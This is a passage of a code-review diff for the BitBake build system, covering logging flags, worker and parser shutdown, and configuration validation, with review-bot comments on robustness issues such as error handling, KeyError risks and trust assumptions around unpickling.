23 parser.add_argument('-u', '--unexpand', help='Do not expand the value (with --value)', action="store_true")
24 parser.add_argument('-f', '--flag', help='Specify a variable flag to query (with --value)', default=None)
25 parser.add_argument('--value', help='Only report the value, no history and no variable name', action="store_true")
26 args = parser.parse_args()
27
28 if args.unexpand and not args.value:
29 print("--unexpand only makes sense with --value")
30 sys.exit(1)
31
32 if args.flag and not args.value:
33 print("--flag only makes sense with --value")
34 sys.exit(1)
35
36 with bb.tinfoil.Tinfoil(tracking=True) as tinfoil:
37 if args.recipe:
38 tinfoil.prepare(quiet=2)
39 d = tinfoil.parse_recipe(args.recipe)
40 else:
41 tinfoil.prepare(quiet=2, config_only=True)
42 d = tinfoil.config_data
43 if args.flag:
44 print(str(d.getVarFlag(args.variable, args.flag, expand=(not args.unexpand))))
45 elif args.value:
46 print(str(d.getVar(args.variable, expand=(not args.unexpand))))
47 else:
48 bb.data.emit_var(args.variable, d=d, all=True)
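Review bot: With `--value` or `--flag`, an unset variable is printed as the string `None` and the script still exits 0, because the result of `d.getVar(...)` / `d.getVarFlag(...)` is passed straight through `str()` in the `if args.flag:` and `elif args.value:` branches; a calling script cannot tell that apart from a variable whose value is literally "None". Capture the value first and fail when it is missing, e.g. `val = d.getVar(args.variable, expand=(not args.unexpand))` followed by `if val is None: sys.exit("%s is not set" % args.variable)`. The two option-conflict messages are also printed to stdout before `sys.exit(1)`; `parser.error("--flag only makes sense with --value")` would send them to stderr together with the usage line. `import io` appears to be unused in this file.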
diff --git a/bitbake/bin/bitbake-worker b/bitbake/bin/bitbake-worker
index 97cc0fd60f..e3ce01eec8 100755
--- a/bitbake/bin/bitbake-worker
+++ b/bitbake/bin/bitbake-worker
@@ -413,9 +413,9 @@ class BitbakeWorker(object):
413 413
414 def handle_workerdata(self, data): 414 def handle_workerdata(self, data):
415 self.workerdata = pickle.loads(data) 415 self.workerdata = pickle.loads(data)
416 bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"]
417 bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"]
416 bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"] 418 bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"]
417 bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"]
418 bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"]
419 bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"] 419 bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"]
420 for mc in self.databuilder.mcdata: 420 for mc in self.databuilder.mcdata:
421 self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"]) 421 self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"])
@@ -505,9 +505,11 @@ except BaseException as e:
505 import traceback 505 import traceback
506 sys.stderr.write(traceback.format_exc()) 506 sys.stderr.write(traceback.format_exc())
507 sys.stderr.write(str(e)) 507 sys.stderr.write(str(e))
508finally:
509 worker_thread_exit = True
510 worker_thread.join()
508 511
509worker_thread_exit = True 512workerlog_write("exiting")
510worker_thread.join() 513if not normalexit:
511 514 sys.exit(1)
512workerlog_write("exitting")
513sys.exit(0) 515sys.exit(0)
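Review bot: The two assignments added to `handle_workerdata` take their values from `self.workerdata`, which the line above builds with `pickle.loads(data)`, and nothing in the hunk records where `data` comes from. Unpickling is only safe when the bytes come from a trusted peer, so a comment above that call such as `# data arrives on the pipe from the parent bitbake server; never unpickle input from any other source` would state the assumption (the origin of `data` is outside the hunk and should be confirmed). The new keys are also read with plain indexing, so a server that does not send `build_verbose_shell` or `build_verbose_stdout` would raise KeyError here. If mixed server and worker versions are possible, `self.workerdata.get("build_verbose_shell", False)` avoids that.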
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
index 93ac18b78a..75e8dd69d9 100644
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
@@ -405,8 +405,8 @@ This fetcher supports the following parameters:
405 405
406- *"nobranch":* Tells the fetcher to not check the SHA validation for 406- *"nobranch":* Tells the fetcher to not check the SHA validation for
407 the branch when set to "1". The default is "0". Set this option for 407 the branch when set to "1". The default is "0". Set this option for
408 the recipe that refers to the commit that is valid for a tag instead 408 the recipe that refers to the commit that is valid for any namespace
409 of the branch. 409 (branch, tag, ...) instead of the branch.
410 410
411- *"bareclone":* Tells the fetcher to clone a bare clone into the 411- *"bareclone":* Tells the fetcher to clone a bare clone into the
412 destination directory without checking out a working tree. Only the 412 destination directory without checking out a working tree. Only the
diff --git a/bitbake/lib/bb/__init__.py b/bitbake/lib/bb/__init__.py
index b96466e654..ba8039497f 100644
--- a/bitbake/lib/bb/__init__.py
+++ b/bitbake/lib/bb/__init__.py
@@ -15,6 +15,13 @@ import sys
15if sys.version_info < (3, 5, 0): 15if sys.version_info < (3, 5, 0):
16 raise RuntimeError("Sorry, python 3.5.0 or later is required for this version of bitbake") 16 raise RuntimeError("Sorry, python 3.5.0 or later is required for this version of bitbake")
17 17
18if sys.version_info < (3, 10, 0):
19 # With python 3.8 and 3.9, we see errors of "libgcc_s.so.1 must be installed for pthread_cancel to work"
20 # https://stackoverflow.com/questions/64797838/libgcc-s-so-1-must-be-installed-for-pthread-cancel-to-work
21 # https://bugs.ams1.psf.io/issue42888
22 # so ensure libgcc_s is loaded early on
23 import ctypes
24 libgcc_s = ctypes.CDLL('libgcc_s.so.1')
18 25
19class BBHandledException(Exception): 26class BBHandledException(Exception):
20 """ 27 """
@@ -47,7 +54,7 @@ class BBLogger(Logger):
47 if not bb.event.worker_pid: 54 if not bb.event.worker_pid:
48 if self.name in bb.msg.loggerDefaultDomains and loglevel > (bb.msg.loggerDefaultDomains[self.name]): 55 if self.name in bb.msg.loggerDefaultDomains and loglevel > (bb.msg.loggerDefaultDomains[self.name]):
49 return 56 return
50 if loglevel > bb.msg.loggerDefaultLogLevel: 57 if loglevel < bb.msg.loggerDefaultLogLevel:
51 return 58 return
52 return self.log(loglevel, msg, *args, **kwargs) 59 return self.log(loglevel, msg, *args, **kwargs)
53 60
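Review bot: `ctypes.CDLL('libgcc_s.so.1')` in the first hunk raises OSError when the loader cannot find the library, and because this runs while `bb` is being imported, every bitbake entry point on Python older than 3.10 would then stop with a bare traceback. Reporting that case clearly would help, for example wrapping the call in `try:` and adding `except OSError as exc: raise RuntimeError("libgcc_s.so.1 could not be loaded: %s" % exc)`, or only warning if the build can continue without it. The library is resolved by bare soname through the normal loader search path, so a short comment that this is intentional and Linux-specific would also be useful.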
diff --git a/bitbake/lib/bb/build.py b/bitbake/lib/bb/build.py
index 23b6ee455f..aaada8a18b 100644
--- a/bitbake/lib/bb/build.py
+++ b/bitbake/lib/bb/build.py
@@ -27,6 +27,9 @@ from bb import data, event, utils
27bblogger = logging.getLogger('BitBake') 27bblogger = logging.getLogger('BitBake')
28logger = logging.getLogger('BitBake.Build') 28logger = logging.getLogger('BitBake.Build')
29 29
30verboseShellLogging = False
31verboseStdoutLogging = False
32
30__mtime_cache = {} 33__mtime_cache = {}
31 34
32def cached_mtime_noerror(f): 35def cached_mtime_noerror(f):
@@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None):
290 lineno = int(d.getVarFlag(func, "lineno", False)) 293 lineno = int(d.getVarFlag(func, "lineno", False))
291 bb.methodpool.insert_method(func, text, fn, lineno - 1) 294 bb.methodpool.insert_method(func, text, fn, lineno - 1)
292 295
293 comp = utils.better_compile(code, func, "exec_python_func() autogenerated") 296 comp = utils.better_compile(code, func, "exec_func_python() autogenerated")
294 utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated") 297 utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated")
295 finally: 298 finally:
296 bb.debug(2, "Python function %s finished" % func) 299 bb.debug(2, "Python function %s finished" % func)
297 300
@@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None):
371 374
372 bb.data.emit_func(func, script, d) 375 bb.data.emit_func(func, script, d)
373 376
374 if bb.msg.loggerVerboseLogs: 377 if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)):
375 script.write("set -x\n") 378 script.write("set -x\n")
376 if cwd: 379 if cwd:
377 script.write("cd '%s'\n" % cwd) 380 script.write("cd '%s'\n" % cwd)
@@ -391,7 +394,7 @@ exit $ret
391 if fakerootcmd: 394 if fakerootcmd:
392 cmd = [fakerootcmd, runfile] 395 cmd = [fakerootcmd, runfile]
393 396
394 if bb.msg.loggerDefaultVerbose: 397 if verboseStdoutLogging:
395 logfile = LogTee(logger, StdoutNoopContextManager()) 398 logfile = LogTee(logger, StdoutNoopContextManager())
396 else: 399 else:
397 logfile = StdoutNoopContextManager() 400 logfile = StdoutNoopContextManager()
@@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr):
587 except bb.BBHandledException: 590 except bb.BBHandledException:
588 event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata) 591 event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata)
589 return 1 592 return 1
590 except Exception as exc: 593 except (Exception, SystemExit) as exc:
591 if quieterr: 594 if quieterr:
592 event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata) 595 event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata)
593 else: 596 else:
594 errprinted = errchk.triggered 597 errprinted = errchk.triggered
598 # If the output is already on stdout, we've printed the information in the
599 # logs once already so don't duplicate
600 if verboseStdoutLogging:
601 errprinted = True
595 logger.error(str(exc)) 602 logger.error(str(exc))
596 event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata) 603 event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata)
597 return 1 604 return 1
@@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d):
901 def follow_chain(task, endtask, chain=None): 908 def follow_chain(task, endtask, chain=None):
902 if not chain: 909 if not chain:
903 chain = [] 910 chain = []
911 if task in chain:
912 bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, " -> ".join(chain)))
904 chain.append(task) 913 chain.append(task)
905 for othertask in tasks: 914 for othertask in tasks:
906 if othertask == task: 915 if othertask == task:
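Review bot: In the `_exec_task` hunk the handler now also receives `SystemExit`, but it still logs `str(exc)`, which for `sys.exit(1)` is just `1` and for a bare `sys.exit()` is an empty string, so the task log gives no hint of what happened. Something like `logger.error("Task called sys.exit(%s)" % exc.code if isinstance(exc, SystemExit) else str(exc))` would make the failure readable. A task that calls `sys.exit(0)` is now also reported through `TaskFailed`; if that is intended, a comment saying so would help. The function continues outside the hunk.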
diff --git a/bitbake/lib/bb/command.py b/bitbake/lib/bb/command.py
index 6abf38668b..b8429b2773 100644
--- a/bitbake/lib/bb/command.py
+++ b/bitbake/lib/bb/command.py
@@ -20,6 +20,7 @@ Commands are queued in a CommandQueue
20 20
21from collections import OrderedDict, defaultdict 21from collections import OrderedDict, defaultdict
22 22
23import io
23import bb.event 24import bb.event
24import bb.cooker 25import bb.cooker
25import bb.remotedata 26import bb.remotedata
@@ -74,8 +75,12 @@ class Command:
74 result = command_method(self, commandline) 75 result = command_method(self, commandline)
75 except CommandError as exc: 76 except CommandError as exc:
76 return None, exc.args[0] 77 return None, exc.args[0]
77 except (Exception, SystemExit): 78 except (Exception, SystemExit) as exc:
78 import traceback 79 import traceback
80 if isinstance(exc, bb.BBHandledException):
81 # We need to start returning real exceptions here. Until we do, we can't
82 # tell if an exception is an instance of bb.BBHandledException
83 return None, "bb.BBHandledException()\n" + traceback.format_exc()
79 return None, traceback.format_exc() 84 return None, traceback.format_exc()
80 else: 85 else:
81 return result, None 86 return result, None
@@ -474,6 +479,17 @@ class CommandsSync:
474 d = command.remotedatastores[dsindex].varhistory 479 d = command.remotedatastores[dsindex].varhistory
475 return getattr(d, method)(*args, **kwargs) 480 return getattr(d, method)(*args, **kwargs)
476 481
482 def dataStoreConnectorVarHistCmdEmit(self, command, params):
483 dsindex = params[0]
484 var = params[1]
485 oval = params[2]
486 val = params[3]
487 d = command.remotedatastores[params[4]]
488
489 o = io.StringIO()
490 command.remotedatastores[dsindex].varhistory.emit(var, oval, val, o, d)
491 return o.getvalue()
492
477 def dataStoreConnectorIncHistCmd(self, command, params): 493 def dataStoreConnectorIncHistCmd(self, command, params):
478 dsindex = params[0] 494 dsindex = params[0]
479 method = params[1] 495 method = params[1]
@@ -620,6 +636,16 @@ class CommandsAsync:
620 command.finishAsyncCommand() 636 command.finishAsyncCommand()
621 findFilesMatchingInDir.needcache = False 637 findFilesMatchingInDir.needcache = False
622 638
639 def testCookerCommandEvent(self, command, params):
640 """
641 Dummy command used by OEQA selftest to test tinfoil without IO
642 """
643 pattern = params[0]
644
645 command.cooker.testCookerCommandEvent(pattern)
646 command.finishAsyncCommand()
647 testCookerCommandEvent.needcache = False
648
623 def findConfigFilePath(self, command, params): 649 def findConfigFilePath(self, command, params):
624 """ 650 """
625 Find the path of the requested configuration file 651 Find the path of the requested configuration file
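Review bot: `dataStoreConnectorVarHistCmdEmit` has no docstring, and its five positional `params` can only be identified by reading the body: `params[0]` and `params[4]` are both indices into `command.remotedatastores`, the first selecting the history and the last the datastore handed to `emit`. A docstring listing them in order (datastore index for the history, variable name, original value, value, datastore index for `d`) would help callers. Both indices are used unchecked, so a stale or wrong index reaches the client only as a traceback string from the generic exception handler in the first hunk of this file; the neighbouring connector commands appear to behave the same way.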
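--- a/bitbake/lib/bb/compat.py
+++ /dev/null
@@ -1,10 +0,0 @@
-#
-# SPDX-License-Identifier: GPL-2.0-only
-#
-
-"""Code pulled from future python versions, here for compatibility"""
-
-from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict
-from functools import total_ordering
-
-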
diff --git a/bitbake/lib/bb/cooker.py b/bitbake/lib/bb/cooker.py
index d90bd3945f..6743bce585 100644
--- a/bitbake/lib/bb/cooker.py
+++ b/bitbake/lib/bb/cooker.py
@@ -13,7 +13,6 @@ import sys, os, glob, os.path, re, time
13import itertools 13import itertools
14import logging 14import logging
15import multiprocessing 15import multiprocessing
16import sre_constants
17import threading 16import threading
18from io import StringIO, UnsupportedOperation 17from io import StringIO, UnsupportedOperation
19from contextlib import closing 18from contextlib import closing
@@ -411,10 +410,7 @@ class BBCooker:
411 self.data.disableTracking() 410 self.data.disableTracking()
412 411
413 def parseConfiguration(self): 412 def parseConfiguration(self):
414 # Set log file verbosity 413 self.updateCacheSync()
415 verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False))
416 if verboselogs:
417 bb.msg.loggerVerboseLogs = True
418 414
419 # Change nice level if we're asked to 415 # Change nice level if we're asked to
420 nice = self.data.getVar("BB_NICE_LEVEL") 416 nice = self.data.getVar("BB_NICE_LEVEL")
@@ -1022,6 +1018,11 @@ class BBCooker:
1022 if matches: 1018 if matches:
1023 bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) 1019 bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
1024 1020
1021 def testCookerCommandEvent(self, filepattern):
1022 # Dummy command used by OEQA selftest to test tinfoil without IO
1023 matches = ["A", "B"]
1024 bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
1025
1025 def findProviders(self, mc=''): 1026 def findProviders(self, mc=''):
1026 return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn) 1027 return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn)
1027 1028
@@ -1636,6 +1637,7 @@ class BBCooker:
1636 return 1637 return
1637 1638
1638 def post_serve(self): 1639 def post_serve(self):
1640 self.shutdown(force=True)
1639 prserv.serv.auto_shutdown() 1641 prserv.serv.auto_shutdown()
1640 if self.hashserv: 1642 if self.hashserv:
1641 self.hashserv.process.terminate() 1643 self.hashserv.process.terminate()
@@ -1650,6 +1652,7 @@ class BBCooker:
1650 1652
1651 if self.parser: 1653 if self.parser:
1652 self.parser.shutdown(clean=not force, force=force) 1654 self.parser.shutdown(clean=not force, force=force)
1655 self.parser.final_cleanup()
1653 1656
1654 def finishcommand(self): 1657 def finishcommand(self):
1655 self.state = state.initial 1658 self.state = state.initial
@@ -1791,7 +1794,7 @@ class CookerCollectFiles(object):
1791 try: 1794 try:
1792 re.compile(mask) 1795 re.compile(mask)
1793 bbmasks.append(mask) 1796 bbmasks.append(mask)
1794 except sre_constants.error: 1797 except re.error:
1795 collectlog.critical("BBMASK contains an invalid regular expression, ignoring: %s" % mask) 1798 collectlog.critical("BBMASK contains an invalid regular expression, ignoring: %s" % mask)
1796 1799
1797 # Then validate the combined regular expressions. This should never 1800 # Then validate the combined regular expressions. This should never
@@ -1799,7 +1802,7 @@ class CookerCollectFiles(object):
1799 bbmask = "|".join(bbmasks) 1802 bbmask = "|".join(bbmasks)
1800 try: 1803 try:
1801 bbmask_compiled = re.compile(bbmask) 1804 bbmask_compiled = re.compile(bbmask)
1802 except sre_constants.error: 1805 except re.error:
1803 collectlog.critical("BBMASK is not a valid regular expression, ignoring: %s" % bbmask) 1806 collectlog.critical("BBMASK is not a valid regular expression, ignoring: %s" % bbmask)
1804 bbmask = None 1807 bbmask = None
1805 1808
@@ -1931,7 +1934,8 @@ class Parser(multiprocessing.Process):
1931 except queue.Empty: 1934 except queue.Empty:
1932 pass 1935 pass
1933 else: 1936 else:
1934 self.results.cancel_join_thread() 1937 self.results.close()
1938 self.results.join_thread()
1935 break 1939 break
1936 1940
1937 if pending: 1941 if pending:
@@ -1940,6 +1944,8 @@ class Parser(multiprocessing.Process):
1940 try: 1944 try:
1941 job = self.jobs.pop() 1945 job = self.jobs.pop()
1942 except IndexError: 1946 except IndexError:
1947 self.results.close()
1948 self.results.join_thread()
1943 break 1949 break
1944 result = self.parse(*job) 1950 result = self.parse(*job)
1945 # Clear the siggen cache after parsing to control memory usage, its huge 1951 # Clear the siggen cache after parsing to control memory usage, its huge
@@ -2015,6 +2021,7 @@ class CookerParser(object):
2015 2021
2016 self.start() 2022 self.start()
2017 self.haveshutdown = False 2023 self.haveshutdown = False
2024 self.syncthread = None
2018 2025
2019 def start(self): 2026 def start(self):
2020 self.results = self.load_cached() 2027 self.results = self.load_cached()
@@ -2056,12 +2063,9 @@ class CookerParser(object):
2056 self.total) 2063 self.total)
2057 2064
2058 bb.event.fire(event, self.cfgdata) 2065 bb.event.fire(event, self.cfgdata)
2059 for process in self.processes: 2066
2060 self.parser_quit.put(None) 2067 for process in self.processes:
2061 else: 2068 self.parser_quit.put(None)
2062 self.parser_quit.cancel_join_thread()
2063 for process in self.processes:
2064 self.parser_quit.put(None)
2065 2069
2066 # Cleanup the queue before call process.join(), otherwise there might be 2070 # Cleanup the queue before call process.join(), otherwise there might be
2067 # deadlocks. 2071 # deadlocks.
@@ -2078,9 +2082,13 @@ class CookerParser(object):
2078 else: 2082 else:
2079 process.join() 2083 process.join()
2080 2084
2085 self.parser_quit.close()
2086 # Allow data left in the cancel queue to be discarded
2087 self.parser_quit.cancel_join_thread()
2088
2081 sync = threading.Thread(target=self.bb_cache.sync) 2089 sync = threading.Thread(target=self.bb_cache.sync)
2090 self.syncthread = sync
2082 sync.start() 2091 sync.start()
2083 multiprocessing.util.Finalize(None, sync.join, exitpriority=-100)
2084 bb.codeparser.parser_cache_savemerge() 2092 bb.codeparser.parser_cache_savemerge()
2085 bb.fetch.fetcher_parse_done() 2093 bb.fetch.fetcher_parse_done()
2086 if self.cooker.configuration.profile: 2094 if self.cooker.configuration.profile:
@@ -2094,6 +2102,10 @@ class CookerParser(object):
2094 bb.utils.process_profilelog(profiles, pout = pout) 2102 bb.utils.process_profilelog(profiles, pout = pout)
2095 print("Processed parsing statistics saved to %s" % (pout)) 2103 print("Processed parsing statistics saved to %s" % (pout))
2096 2104
2105 def final_cleanup(self):
2106 if self.syncthread:
2107 self.syncthread.join()
2108
2097 def load_cached(self): 2109 def load_cached(self):
2098 for filename, appends in self.fromcache: 2110 for filename, appends in self.fromcache:
2099 cached, infos = self.bb_cache.load(filename, appends) 2111 cached, infos = self.bb_cache.load(filename, appends)
@@ -2126,18 +2138,18 @@ class CookerParser(object):
2126 except bb.BBHandledException as exc: 2138 except bb.BBHandledException as exc:
2127 self.error += 1 2139 self.error += 1
2128 logger.error('Failed to parse recipe: %s' % exc.recipe) 2140 logger.error('Failed to parse recipe: %s' % exc.recipe)
2129 self.shutdown(clean=False) 2141 self.shutdown(clean=False, force=True)
2130 return False 2142 return False
2131 except ParsingFailure as exc: 2143 except ParsingFailure as exc:
2132 self.error += 1 2144 self.error += 1
2133 logger.error('Unable to parse %s: %s' % 2145 logger.error('Unable to parse %s: %s' %
2134 (exc.recipe, bb.exceptions.to_string(exc.realexception))) 2146 (exc.recipe, bb.exceptions.to_string(exc.realexception)))
2135 self.shutdown(clean=False) 2147 self.shutdown(clean=False, force=True)
2136 return False 2148 return False
2137 except bb.parse.ParseError as exc: 2149 except bb.parse.ParseError as exc:
2138 self.error += 1 2150 self.error += 1
2139 logger.error(str(exc)) 2151 logger.error(str(exc))
2140 self.shutdown(clean=False) 2152 self.shutdown(clean=False, force=True)
2141 return False 2153 return False
2142 except bb.data_smart.ExpansionError as exc: 2154 except bb.data_smart.ExpansionError as exc:
2143 self.error += 1 2155 self.error += 1
@@ -2146,7 +2158,7 @@ class CookerParser(object):
2146 tb = list(itertools.dropwhile(lambda e: e.filename.startswith(bbdir), exc.traceback)) 2158 tb = list(itertools.dropwhile(lambda e: e.filename.startswith(bbdir), exc.traceback))
2147 logger.error('ExpansionError during parsing %s', value.recipe, 2159 logger.error('ExpansionError during parsing %s', value.recipe,
2148 exc_info=(etype, value, tb)) 2160 exc_info=(etype, value, tb))
2149 self.shutdown(clean=False) 2161 self.shutdown(clean=False, force=True)
2150 return False 2162 return False
2151 except Exception as exc: 2163 except Exception as exc:
2152 self.error += 1 2164 self.error += 1
@@ -2158,7 +2170,7 @@ class CookerParser(object):
2158 # Most likely, an exception occurred during raising an exception 2170 # Most likely, an exception occurred during raising an exception
2159 import traceback 2171 import traceback
2160 logger.error('Exception during parse: %s' % traceback.format_exc()) 2172 logger.error('Exception during parse: %s' % traceback.format_exc())
2161 self.shutdown(clean=False) 2173 self.shutdown(clean=False, force=True)
2162 return False 2174 return False
2163 2175
2164 self.current += 1 2176 self.current += 1
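Review bot: In the two `Parser` hunks, `self.results.close()` followed by `self.results.join_thread()` makes the parser process wait until everything it has queued has been written to the pipe, where the removed `cancel_join_thread()` let it exit at once. If the parent has stopped reading the results queue when the quit message arrives, the child can block there and the `process.join()` in `CookerParser.shutdown` would wait on it; whether the queue is always drained first depends on code outside these hunks. A comment at both call sites saying why the join cannot block, e.g. `# the parent empties the results queue before joining us, so this flush completes`, would make the shutdown ordering easier to verify.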
diff --git a/bitbake/lib/bb/cookerdata.py b/bitbake/lib/bb/cookerdata.py
index 472423fdc8..30727bf2ee 100644
--- a/bitbake/lib/bb/cookerdata.py
+++ b/bitbake/lib/bb/cookerdata.py
@@ -58,11 +58,14 @@ class ConfigParameters(object):
58 def updateToServer(self, server, environment): 58 def updateToServer(self, server, environment):
59 options = {} 59 options = {}
60 for o in ["abort", "force", "invalidate_stamp", 60 for o in ["abort", "force", "invalidate_stamp",
61 "verbose", "debug", "dry_run", "dump_signatures", 61 "debug", "dry_run", "dump_signatures",
62 "debug_domains", "extra_assume_provided", "profile", 62 "debug_domains", "extra_assume_provided", "profile",
63 "prefile", "postfile", "server_timeout"]: 63 "prefile", "postfile", "server_timeout"]:
64 options[o] = getattr(self.options, o) 64 options[o] = getattr(self.options, o)
65 65
66 options['build_verbose_shell'] = self.options.verbose
67 options['build_verbose_stdout'] = self.options.verbose
68
66 ret, error = server.runCommand(["updateConfig", options, environment, sys.argv]) 69 ret, error = server.runCommand(["updateConfig", options, environment, sys.argv])
67 if error: 70 if error:
68 raise Exception("Unable to update the server configuration with local parameters: %s" % error) 71 raise Exception("Unable to update the server configuration with local parameters: %s" % error)
@@ -125,6 +128,8 @@ class CookerConfiguration(object):
125 self.skipsetscene = False 128 self.skipsetscene = False
126 self.invalidate_stamp = False 129 self.invalidate_stamp = False
127 self.dump_signatures = [] 130 self.dump_signatures = []
131 self.build_verbose_shell = False
132 self.build_verbose_stdout = False
128 self.dry_run = False 133 self.dry_run = False
129 self.tracking = False 134 self.tracking = False
130 self.xmlrpcinterface = [] 135 self.xmlrpcinterface = []
@@ -297,6 +302,8 @@ class CookerDataBuilder(object):
297 302
298 multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split() 303 multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split()
299 for config in multiconfig: 304 for config in multiconfig:
305 if config[0].isdigit():
306 bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config)
300 mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config) 307 mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config)
301 bb.event.fire(bb.event.ConfigParsed(), mcdata) 308 bb.event.fire(bb.event.ConfigParsed(), mcdata)
302 self.mcdata[config] = mcdata 309 self.mcdata[config] = mcdata
@@ -348,6 +355,9 @@ class CookerDataBuilder(object):
348 layers = (data.getVar('BBLAYERS') or "").split() 355 layers = (data.getVar('BBLAYERS') or "").split()
349 broken_layers = [] 356 broken_layers = []
350 357
358 if not layers:
359 bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition")
360
351 data = bb.data.createCopy(data) 361 data = bb.data.createCopy(data)
352 approved = bb.utils.approved_variables() 362 approved = bb.utils.approved_variables()
353 363
@@ -399,6 +409,8 @@ class CookerDataBuilder(object):
399 if c in collections_tmp: 409 if c in collections_tmp:
400 bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c) 410 bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c)
401 compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split()) 411 compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split())
412 if compat and not layerseries:
413 bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c)
402 if compat and not (compat & layerseries): 414 if compat and not (compat & layerseries):
403 bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)" 415 bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)"
404 % (c, " ".join(layerseries), " ".join(compat))) 416 % (c, " ".join(layerseries), " ".join(compat)))
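Review bot: `build_verbose_shell` and `build_verbose_stdout` in `updateToServer` are both filled from `self.options.verbose`, so the two settings can never differ when they come from the command line, and nothing here says what each one controls. In the build.py part of this commit the shell flag causes `set -x` to be written into task run scripts, which puts fully expanded command lines into the task logs. Those can include credentials passed as arguments or embedded in URLs, which matters when `-v` logs are shared. A comment such as `# -v turns on both shell tracing (set -x) in run scripts and copying task output to stdout` would record this.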
diff --git a/bitbake/lib/bb/data.py b/bitbake/lib/bb/data.py
index b0683c5180..1d21e00a1c 100644
--- a/bitbake/lib/bb/data.py
+++ b/bitbake/lib/bb/data.py
@@ -301,6 +301,7 @@ def build_dependencies(key, keys, shelldeps, varflagsexcl, d):
301 value += "\n_remove of %s" % r 301 value += "\n_remove of %s" % r
302 deps |= r2.references 302 deps |= r2.references
303 deps = deps | (keys & r2.execs) 303 deps = deps | (keys & r2.execs)
304 value = handle_contains(value, r2.contains, d)
304 return value 305 return value
305 306
306 if "vardepvalue" in varflags: 307 if "vardepvalue" in varflags:
diff --git a/bitbake/lib/bb/data_smart.py b/bitbake/lib/bb/data_smart.py
index 1d8774ee5e..c46d3f0a08 100644
--- a/bitbake/lib/bb/data_smart.py
+++ b/bitbake/lib/bb/data_smart.py
@@ -17,7 +17,7 @@ BitBake build tools.
17# Based on functions from the base bb module, Copyright 2003 Holger Schurig 17# Based on functions from the base bb module, Copyright 2003 Holger Schurig
18 18
19import copy, re, sys, traceback 19import copy, re, sys, traceback
20from collections import MutableMapping 20from collections.abc import MutableMapping
21import logging 21import logging
22import hashlib 22import hashlib
23import bb, bb.codeparser 23import bb, bb.codeparser
@@ -28,7 +28,7 @@ logger = logging.getLogger("BitBake.Data")
28 28
29__setvar_keyword__ = ["_append", "_prepend", "_remove"] 29__setvar_keyword__ = ["_append", "_prepend", "_remove"]
30__setvar_regexp__ = re.compile(r'(?P<base>.*?)(?P<keyword>_append|_prepend|_remove)(_(?P<add>[^A-Z]*))?$') 30__setvar_regexp__ = re.compile(r'(?P<base>.*?)(?P<keyword>_append|_prepend|_remove)(_(?P<add>[^A-Z]*))?$')
31__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~]+?}") 31__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~:]+?}")
32__expand_python_regexp__ = re.compile(r"\${@.+?}") 32__expand_python_regexp__ = re.compile(r"\${@.+?}")
33__whitespace_split__ = re.compile(r'(\s)') 33__whitespace_split__ = re.compile(r'(\s)')
34__override_regexp__ = re.compile(r'[a-z0-9]+') 34__override_regexp__ = re.compile(r'[a-z0-9]+')
@@ -403,7 +403,7 @@ class DataSmart(MutableMapping):
403 s = __expand_python_regexp__.sub(varparse.python_sub, s) 403 s = __expand_python_regexp__.sub(varparse.python_sub, s)
404 except SyntaxError as e: 404 except SyntaxError as e:
405 # Likely unmatched brackets, just don't expand the expression 405 # Likely unmatched brackets, just don't expand the expression
406 if e.msg != "EOL while scanning string literal": 406 if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"):
407 raise 407 raise
